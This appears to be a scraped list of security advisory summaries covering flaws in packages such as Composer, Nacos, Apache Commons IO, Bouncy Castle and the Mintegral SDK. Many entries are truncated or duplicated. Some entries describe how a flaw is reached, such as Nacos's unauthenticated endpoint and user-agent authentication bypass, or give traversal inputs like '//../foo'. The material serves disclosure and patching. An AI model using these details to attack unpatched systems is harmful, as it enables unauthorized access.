Bootstrap Package is a theme for TYPO3. It has been discovered that rendering content in the website frontend is vulnerable to cross-site scripting. A valid backend user account is needed to exploit this vulnerability. Users of the extension, who have overwritten the affected templates with custom code must manually apply the security fix. Update to version 7.1.2, 8.0.8, 9.1.4, 10.0.10 or 11.0.3 of the Bootstrap Package that fix the problem …

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

Composer is a dependency manager for PHP. URLs for Mercurial repositories in the root composer.json and package source download URLs are not sanitized correctly. Specifically crafted URL values allow code to be executed in the HgDriver if hg/Mercurial is installed on the system. The impact to Composer users directly is limited as the composer.json file is typically under their own control and source download URLs can only be supplied by …

Files or Directories Accessible to External Parties

OpenAPI Generator allows generation of API client libraries, server stubs, documentation and configuration automatically given an OpenAPI Spec. Using File.createTempFile in JDK will result in creating and using insecure temporary files that can leave application and system data vulnerable to attacks. OpenAPI Generator maven plug-in creates insecure temporary files during the process. The issue has been patched with Files.createTempFile and released in the v5.1.0 stable version.

Dependency Confusion

Bundler sometimes chooses a dependency source based on the highest gem version number, which means that a rogue gem found at a public source may be chosen, even if the intended choice was a private gem that is a dependency of another private gem that is explicitly depended on by the application.

Loop with Unreachable Exit Condition (Infinite Loop)

xz is a compression and decompression library focusing on the xz format completely written in Go. The function readUvarint used to read the xz container format may not terminate a loop provide malicous input. As a workaround, users can limit the size of the compressed file input to a reasonable size for their use case. The standard library recently had the same issue described in CVE-2020-16845.

URL Redirection to Untrusted Site (Open Redirect)

Apache Superset allowed for the creation of an external URL that could be malicious. By not checking user input for open redirects the URL shortener functionality would allow for a malicious user to create a short URL for a dashboard that could convince the user to click the link.

Missing Authorization

The S3 buckets and keys in a secure Apache Ozone Cluster must be inaccessible to anonymous access by default. The current security vulnerability allows access to keys and buckets through a curl command or an unauthenticated HTTP request. This enables unauthorized access to buckets and keys thereby exposing data to anonymous clients or users.

Missing Authentication for Critical Function

Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so …

Missing Authentication for Critical Function

Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage …

Files or Directories Accessible to External Parties

OpenAPI Generator allows generation of API client libraries, server stubs, documentation and configuration automatically given an OpenAPI Spec. Using File.createTempFile in JDK will result in creating and using insecure temporary files that can leave application and system data vulnerable to attacks. OpenAPI Generator maven plug-in creates insecure temporary files during the process.

Authentication Bypass by Spoofing

Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos, when configured to use authentication -Dnacos.core.auth.enabled=true it uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to …

Authentication Bypass by Spoofing

Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true) Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow …

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value.

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value.

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value.

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value.

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value.

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value.

Uncontrolled Resource Consumption in pillow

Impact Pillow before 8.1.1 allows attackers to cause a denial of service because the reported size of a contained image is not properly checked for a BLP container, and thus an attempted memory allocation can be very large. Patches An issue was discovered in Pillow before 6.2.0. When reading specially crafted invalid image files, the library can either allocate very large amounts of memory or take an extremely long period …

Uncontrolled Resource Consumption

When a client is in monitoring mode, the regex begin used to detected monitor messages could cause exponential backtracking on some strings. This issue could lead to a denial of service. The issue is patched

Prototype Pollution

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in mootools-more allows a malicious user to inject properties into Object.prototype.

Prototype Pollution

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in jquery-bbq allows a malicious user to inject properties into Object.prototype.

Prototype Pollution

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in purl allows a malicious user to inject properties into Object.prototype.

Prototype Pollution

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in jquery-deparam allows a malicious user to inject properties into Object.prototype.

Origin Validation Error

Apache Maven will follow repositories that are defined in a dependency’s Project Object Model (pom) which may be surprising to some users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository.

Origin Validation Error

Apache Maven will follow repositories that are defined in a dependency’s Project Object Model (pom) which may be surprising to some users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository.

Origin Validation Error

Apache Maven will follow repositories that are defined in a dependency’s Project Object Model (pom) which may be surprising to some users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository.

Improper Certificate Validation

The xmlhttprequest-ssl package for Node.js disables SSL certificate validation by default, because rejectUnauthorized (when the property exists but is undefined) is considered to be false within the https.request function of Node.js. In other words, no certificate is ever rejected.

Observable Discrepancy

In Legion of the Bouncy Castle BC before 1.61 and BC-FJA before 1.0.1.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key …

Observable Discrepancy

In Legion of the Bouncy Castle BC before 1.61 and BC-FJA before 1.0.1.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key …

Observable Discrepancy

In Legion of the Bouncy Castle BC before 1.61 and BC-FJA before 1.0.1.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key …

Observable Discrepancy

In Legion of the Bouncy Castle BC before 1.61 and BC-FJA before 1.0.1.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key …

Insufficient Session Expiration

Authentication.logout() helper in com.vaadin:flow-client versions 5.0.0 prior to 6.0.0 (Vaadin 18), and 6.0.0 through 6.0.4 (Vaadin 19.0.0 through 19.0.3) uses incorrect HTTP method, which, in combination with Spring Security CSRF protection, allows local attackers to access Fusion endpoints after the user attempted to log out.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

There is an XSS (cross-site scripting) vulnerability in GwtUpload 1.0.3 in the file upload functionality. Someone can upload a file with a malicious filename, which contains JavaScript code, which would result in XSS. Cross-site scripting enables attackers to steal data, change the appearance of a website, and perform other malicious activities like phishing or drive-by hacking.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It is possible to persistently inject scripts in XWiki versions prior to 12.6.3 and 12.8. Unregistred users can fill simple text fields. Registered users can fill in their personal information and (if they have edit rights) fill the values of static lists using App Within Minutes. There is no easy workaround except upgrading …

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack via the styleSheetPath, which allows a malicious actor to inject javascript into the web page. This vulnerability affects all versions of Apache CXF prior to 3.4.1 and 3.3.8. Please note that this is a separate issue to CVE-2019-17573.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It is possible to persistently inject scripts in XWiki versions prior to 12.6.3 and 12.8. Unregistred users can fill simple text fields. Registered users can fill in their personal information and (if they have edit rights) fill the values of static lists using App Within Minutes. There is no easy workaround except upgrading …

Improper Control of Generation of Code ('Code Injection')

** DISPUTED ** oauth2-server (aka node-oauth2-server) implements OAuth without PKCE. It does not prevent authorization code injection. This is similar to CVE-2020-7692. NOTE: the vendor states 'As RFC7636 is an extension, I think the claim in the Readme of "RFC compliant" is valid and not misleading and I also therefore wouldn't describe this as a "vulnerability" with the library per se.'

Improper Certificate Validation

HttpUtils#getURLConnection method disables explicitly hostname verification for HTTPS connections making clients vulnerable to man-in-the-middle attacks. Calcite uses internally this method to connect with Druid and Splunk so information leakage may happen when using the respective Calcite adapters. The method itself is in a utility class so people may use it to create vulnerable HTTPS connections for other applications. From Apache Calcite 1.26 onwards, the hostname verification will be performed using …

Improper Certificate Validation

HttpUtils#getURLConnection method disables explicitly hostname verification for HTTPS connections making clients vulnerable to man-in-the-middle attacks. Calcite uses internally this method to connect with Druid and Splunk so information leakage may happen when using the respective Calcite adapters. The method itself is in a utility class so people may use it to create vulnerable HTTPS connections for other applications. From Apache Calcite 1.26 onwards, the hostname verification will be performed using …

Deserialization of Untrusted Data

Magento-lts is a long-term support alternative to Magento Community Edition (CE). In magento-lts versions 19.4.12 and prior and 20.0.8 and prior, there is a vulnerability caused by the unsecured deserialization of an object. A patch in versions 19.4.13 and 20.0.9 was back ported from Zend Framework 3. The vulnerability was assigned CVE-2021-3007 in Zend Framework.

Cleartext Transmission of Sensitive Information

This affects all versions of package com.mintegral.msdk:alphab. The Android SDK distributed by the company contains malicious functionality in this module that tracks: 1. Downloads from Google urls either within Google apps or via browser including file downloads, e-mail attachments and Google Docs links. 2. All apk downloads, either organic or not. Mintegral listens to download events in Android's download manager and detects if the downloaded file's url contains: a. google.com …